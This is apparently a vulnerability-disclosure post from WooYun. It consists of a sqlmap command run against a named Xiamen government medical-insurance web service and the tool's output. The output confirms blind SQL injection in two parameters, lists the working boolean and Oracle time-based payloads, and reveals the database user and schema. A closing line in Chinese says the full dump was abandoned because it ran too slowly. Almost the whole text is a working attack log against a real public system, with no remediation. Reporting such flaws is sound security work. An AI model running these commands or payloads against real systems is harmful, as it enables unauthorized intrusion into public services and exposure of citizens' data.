WooYun.org

python sqlmap.py -u "https://app.xmhrss.gov.cn/wcm/servlet/MedicareDrugsServlet?ypmc00=h&sfybxm=Y&x=25&y=10" -p ypmc00 --is-dba --current-db --current-user
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: ypmc00
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ypmc00=h%' AND 1170=1170 AND '%'='&sfybxm=Y&x=25&y=10
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: ypmc00=h%' AND 8547=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND '%'='&sfybxm=Y&x=25&y=10
Place: GET
Parameter: sfybxm
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ypmc00=h&sfybxm=Y' AND 4981=4981 AND 'Yiql'='Yiql&x=25&y=10
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: ypmc00=h&sfybxm=Y' AND 4981=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'kLrB'='kLrB&x=25&y=10
---
web application technology: Servlet 2.5, JSP, JSP 2.1
back-end DBMS: Oracle
current user: 'SBKXXW'
current schema (equivalent to database on Oracle): 'SBKXXW'
current user is DBA: False
数据库：
跑的太慢了，就不跑玩了